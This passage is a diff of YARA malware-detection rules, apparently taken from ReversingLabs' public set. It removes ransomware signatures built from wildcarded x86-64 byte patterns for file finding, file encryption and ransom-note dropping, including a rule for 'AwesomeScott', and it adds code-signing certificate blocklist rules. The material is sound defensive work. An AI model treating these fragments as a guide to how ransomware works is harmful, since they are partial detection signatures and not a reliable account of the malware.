?? 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D - 4D ?? E8 ?? ?? ?? ?? 90 45 33 C0 48 8D 55 ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B F8 48 8B - 55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA ?? ?? - ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 89 75 ?? 48 83 FF ?? 0F 85 - ?? ?? ?? ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? - 66 89 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D - 4D ?? E8 ?? ?? ?? ?? 90 45 33 C0 48 8D 55 ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B F8 48 8B - 55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA ?? ?? - ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 89 75 ?? 48 83 FF ?? 0F 85 - ?? ?? ?? ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? - 66 89 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D - 4D ?? E8 ?? ?? ?? ?? 90 45 33 C0 48 8D 55 ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B F8 48 8B - 55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA ?? ?? - ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 - } - $encrypt_files_v1 = { - 41 83 CC ?? 44 89 64 24 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 83 FF ?? 48 0F 43 8C 24 ?? ?? - ?? ?? FF 15 ?? ?? ?? ?? 8B F8 41 83 E4 ?? 44 89 64 24 ?? 48 8B 94 24 ?? ?? ?? ?? 48 - 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? - ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 89 94 24 ?? ?? ?? ?? 48 8B 49 - ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ?? - ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 9C 24 ?? ?? 00 00 40 F6 C7 ?? 74 - ?? 49 8B CF E8 ?? ?? ?? ?? 90 48 BE ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? 4C - 8D 35 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? E9 ?? ?? ?? ?? 49 8B CF E8 ?? ?? ?? ?? C6 84 - 24 ?? ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B F0 48 - 89 9C 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 4C 8B 70 ?? 48 - 83 78 ?? ?? 72 ?? 48 8B 30 48 8D 8C 24 ?? ?? ?? ?? 49 83 FE ?? 73 ?? 41 B8 ?? ?? ?? - ?? 48 8B D6 E8 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? - ?? EB ?? 4C 89 AC 24 ?? ?? ?? ?? 49 8B FE 48 83 CF ?? 48 89 BC 24 ?? ?? ?? ?? 49 3B - FD 49 0F 47 FD 48 8D 57 ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 4E 8D 04 75 ?? ?? - ?? ?? 48 8B D6 48 8B C8 E8 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 48 89 BC 24 - } - $find_system_volumes_v2 = { - BA ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 0F 1F 44 00 ?? 4C 8D 8D ?? - ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 - C0 0F 84 ?? ?? ?? ?? 89 74 24 ?? 48 89 74 24 ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24 ?? - 48 89 74 24 ?? 45 33 C9 45 33 C0 33 D2 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 - 0F 84 ?? ?? ?? ?? F7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 4C 8D 04 00 48 8D 85 ?? ?? ?? ?? 49 03 C0 48 89 74 24 ?? 48 89 74 - 24 ?? 48 89 74 24 ?? 48 89 74 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 89 74 24 ?? 48 8D - 8D ?? ?? ?? ?? 48 3B C8 74 ?? 49 D1 F8 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? - ?? ?? 90 48 8B 43 ?? 48 3B 43 ?? 74 ?? 48 89 30 48 89 70 ?? 48 89 70 ?? 41 B8 ?? ?? - ?? ?? 48 8D 54 24 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 89 74 24 ?? 48 C7 44 24 ?? ?? ?? ?? - ?? 66 89 74 24 ?? 48 83 43 ?? ?? EB ?? 4C 8D 44 24 ?? 48 8B D0 48 8B CB E8 ?? ?? ?? - ?? 90 48 8B 54 24 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B - C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 - ?? 77 ?? E8 ?? ?? ?? ?? 48 89 74 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 89 74 24 ?? 41 - B8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 - 8B CF FF 15 ?? ?? ?? ?? 48 8B C3 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5F 5E - 5D C3 - } - $drop_ransom_note = { - 48 83 3D ?? ?? ?? ?? ?? 48 0F 43 15 ?? ?? ?? ?? 4C 8B 05 ?? ?? ?? ?? 48 8D 4D ?? E8 - ?? ?? ?? ?? 48 8B D8 4C 89 75 ?? 4C 89 75 ?? 4C 89 75 ?? 45 8D 46 ?? 48 8B D0 48 8D - 4D ?? E8 ?? ?? ?? ?? 4C 89 73 ?? 48 C7 43 ?? ?? ?? ?? ?? 66 44 89 33 BE ?? ?? ?? ?? - 89 75 ?? 83 E6 ?? 89 75 ?? 48 8B 55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 - 8B 4D ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 - C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 75 ?? 48 C7 45 ?? ?? ?? ?? - ?? 66 44 89 75 ?? 48 8D 4D ?? 48 83 7D ?? ?? 48 0F 43 4D ?? 4C 89 74 24 ?? C7 44 24 - ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? FF 15 ?? ?? - ?? ?? 48 8B D8 48 83 F8 ?? 74 ?? 4C 89 74 24 ?? 45 33 C9 41 B8 ?? ?? ?? ?? 48 8D 15 - ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 83 E6 ?? 89 75 ?? - 48 8B 55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA - ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 44 89 75 ?? 48 8B 57 - ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 0F 48 81 FA ?? ?? ?? ?? 72 ?? 48 - 83 C2 ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 77 ?? 49 8B C8 E8 ?? ?? ?? ?? - 4C 89 77 ?? 48 C7 47 ?? ?? ?? ?? ?? 66 44 89 37 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? - 49 8B 73 ?? 49 8B 7B - } - $encrypt_files_v2_p1 = { - BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 48 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 - 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 85 C9 0F 84 ?? ?? ?? ?? 49 8B FA 49 8B D1 4D 85 D2 - 74 ?? 4C 8B C1 4D 2B C1 0F B7 02 66 41 39 04 10 75 ?? 48 83 C2 ?? 48 83 EF ?? 75 ?? - 49 2B CB 48 D1 F9 E9 ?? ?? ?? ?? 48 83 C1 ?? E9 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 - 8B CB FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8B CB FF 15 ?? ?? ?? ?? 90 48 8D 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? - 48 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 8B BD ?? ?? ?? ?? B2 ?? 48 8D 4C 24 ?? E8 ?? - ?? ?? ?? B2 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 0B 00 F3 0F 7F 45 ?? - 48 89 75 ?? 48 89 75 ?? 48 8D 45 ?? 48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? - C6 45 ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 45 ?? 48 C7 45 ?? ?? ?? ?? ?? C6 45 - ?? ?? 48 8D 45 ?? 83 E0 ?? 48 8D 44 05 ?? 48 89 45 ?? 89 75 ?? C7 45 ?? ?? ?? ?? ?? - 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ?? - ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 - 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 - 8D 05 ?? ?? ?? ?? 48 89 45 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 - C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C - 8B E8 48 89 44 24 ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F8 48 89 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 - } - $encrypt_files_v2_p2 = { - 8B D5 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D7 48 8D 0D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8B CF 41 B8 ?? ?? ?? ?? 49 8B D5 - 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 8B D5 48 8B 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 83 C1 ?? 41 B8 ?? ?? ?? ?? 48 8B D7 E8 ?? ?? ?? ?? - BF ?? ?? ?? ?? 4C 3B FF 0F 8D ?? ?? ?? ?? F2 0F 10 35 ?? ?? ?? ?? 48 8B FE 49 8B C7 - 48 2B C7 48 99 83 E2 ?? 48 03 C2 48 C1 F8 ?? 4C 8B F0 F2 0F 59 35 ?? ?? ?? ?? 0F 57 - C0 F2 48 0F 2A C0 F2 0F 59 F0 F2 48 0F 2C CE 48 85 C9 0F 85 ?? ?? ?? ?? 4D 85 FF 0F - 8E ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? - 90 48 8D 35 ?? ?? ?? ?? 48 89 75 ?? 4C 8D 35 ?? ?? ?? ?? 4C 89 75 ?? 48 8D 05 ?? ?? - ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 - ?? 4D 8B CF 45 33 C0 48 8B D3 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 49 - 81 FF ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? F2 0F 10 35 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 - ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 - 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? - 48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 4C 8B CF 45 33 C0 48 8B D3 49 8B CE - E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 99 48 F7 F9 4C 8B E8 48 85 C0 75 ?? 48 8D 45 ?? 48 - } - $encrypt_files_v2_p3 = { - 89 44 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 35 ?? ?? ?? ?? 48 89 - 75 ?? 4C 8D 35 ?? ?? ?? ?? 4C 89 75 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? - ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 4D 8B CF 45 33 C0 48 8B D3 - 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B 6C 24 ?? E9 ?? ?? ?? ?? 4D 85 F6 0F 8E ?? - ?? ?? ?? 4D 8B FD 49 C1 E7 ?? 4C 8B A5 ?? ?? ?? ?? 90 48 8D 45 ?? 48 89 44 24 ?? 48 - 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 - ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 - 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 41 B9 ?? ?? ?? ?? 4C 8B C7 48 8B D3 49 8B - CC E8 ?? ?? ?? ?? 49 03 F5 49 03 FF 49 3B F6 7C ?? 4C 8B A5 ?? ?? ?? ?? 4C 8B 6C 24 - ?? 48 8D 35 ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 4C 8B C3 48 8B 95 - ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 4D 8B C4 - 48 8D 95 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 95 ?? ?? ?? ?? 48 - 85 D2 74 ?? 48 8B FA 33 C0 B9 ?? ?? ?? ?? F3 AA 48 8B CA E8 ?? ?? ?? ?? 90 4D 85 ED - 74 ?? 49 8B FD 33 C0 B9 ?? ?? ?? ?? F3 AA 49 8B CD E8 ?? ?? ?? ?? 90 48 89 74 24 ?? - 4C 89 74 24 - } - condition: - uint16(0)==0x5A4D and ((($find_files) and ( all of ($find_system_volumes_v1_p*)) and ( all of ($set_default_icon_p*)) and ($cmd_prompt) and ($exclude_from_encryption) and ($encrypt_files_v1)) or (($find_files) and ($cmd_prompt) and ($find_system_volumes_v2) and ($drop_ransom_note) and ( all of ($encrypt_files_v2_p*)))) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="5b:47:a4:73:9d:d8:ff:e8:1d:9b:53:07" and 1476953007<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win64_Ransomware_Awesomescott : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_4F5A9Bf75Da76B949645475473793A7D : INFO FILE { meta: - description = "Yara rule that detects AwesomeScott ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "36d3b801-dbdb-585a-ac80-1827a6749c87" - date = "2020-09-16" - modified = "2020-09-16" + id = "90cdf420-bdfc-509a-a64f-f30710f09f3b" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win64.Ransomware.AwesomeScott.yara#L1-L101" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ed8096a4abbd015f79f4ec7239cd4070194ad70fa03da6714e499a41f9fb9423" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14712-L14728" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8c58d30b1b6ef80409d9da5f5f4bc26a8818b01cc388b5966c8b68ed0e4c5a2a" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "AwesomeScott" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 48 8B C4 48 89 58 ?? 48 89 68 ?? 48 89 70 ?? 57 41 54 41 55 41 56 41 57 48 83 EC ?? - 45 33 FF 4C 8B F2 49 8B D8 4C 89 78 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 4C - 89 78 ?? 4C 89 78 ?? 4C 89 78 ?? 4C 89 78 ?? B8 ?? ?? ?? ?? 48 8B F1 45 33 C9 44 8B - C0 8B D0 49 8B CE 45 32 ED 48 83 CD ?? 49 8B FF FF 15 ?? ?? ?? ?? 4C 8B E0 48 3B C5 - 75 ?? FF 15 ?? ?? ?? ?? 8B D8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ?? - ?? ?? E9 ?? ?? ?? ?? 45 33 C9 4C 89 7C 24 ?? 48 8B CB 41 8D 51 ?? 45 8D 41 ?? C7 44 - 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B E8 48 83 F8 ?? 75 - ?? FF 15 ?? ?? ?? ?? 8B D8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ?? ?? - ?? E9 ?? ?? ?? ?? BB ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 4C 24 ?? 33 D2 44 8B CB - } - $encrypt_files_p2 = { - 44 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? - 4C 8D 05 ?? ?? ?? ?? 48 8D 4C 24 ?? 44 8B CB 33 D2 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? - ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C - 24 ?? 48 8D 44 24 ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? 48 89 44 24 ?? FF 15 ?? ?? ?? - ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 0D ?? ?? - ?? ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 44 8B C0 45 33 C9 FF 15 - ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 8B - 44 24 ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 41 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 44 24 - ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ?? - ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 75 ?? 41 B8 ?? ?? ?? ?? 48 8D 15 - ?? ?? ?? ?? E9 ?? ?? ?? ?? 32 DB 90 4C 8D 4C 24 ?? 41 B8 ?? ?? ?? ?? 48 8B D7 49 8B - CC 4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 81 7C 24 ?? ?? ?? ?? ?? - 48 8B 4C 24 ?? B8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 0F B6 DB 0F 42 D8 48 8D 44 24 - ?? 45 33 C9 48 89 44 24 ?? 44 0F B6 C3 33 D2 48 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 - } - $encrypt_files_p3 = { - 74 ?? 44 8B 44 24 ?? 4C 8D 4C 24 ?? 48 8B D7 48 8B CD 4C 89 7C 24 ?? FF 15 ?? ?? ?? - ?? 85 C0 74 ?? 84 DB 0F 84 ?? ?? ?? ?? 41 B5 ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? - ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D - 15 ?? ?? ?? ?? 44 8B C0 48 8B CE E8 ?? ?? ?? ?? 4D 85 E4 74 ?? 49 8B CC FF 15 ?? ?? - ?? ?? 48 85 ED 74 ?? 48 8B CD FF 15 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF E8 ?? ?? ?? - ?? 48 8B 4C 24 ?? 48 85 C9 74 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B - D8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C - 8D 05 ?? ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 - 8D 15 ?? ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ?? ?? ?? 4C 89 7C 24 ?? 48 8B - 4C 24 ?? 48 85 C9 74 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B D8 E8 ?? - ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? - ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? - ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ?? ?? ?? 48 8B 4C 24 - } - $find_files = { - E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 33 F6 33 D2 41 B8 ?? ?? ?? ?? 66 89 B4 24 ?? - ?? 00 00 E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8B D7 FF 15 - ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 - F8 ?? 0F 84 ?? ?? ?? ?? 0F 1F 40 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? 41 B8 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? 41 - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 4C 8D 44 - 24 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8B D7 FF 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? - ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? - 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D - 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? - ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? - ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 - 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C - 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? - FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 - ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? - ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? - 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 - 0F 85 ?? ?? ?? ?? 8B 44 24 ?? A8 ?? 0F 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? 48 8D - 8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 89 B4 24 ?? ?? 00 00 E8 ?? ?? ?? ?? 48 - 8D 8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 89 B4 24 ?? ?? 00 00 E8 ?? ?? ?? ?? - 4C 8D 44 24 ?? 48 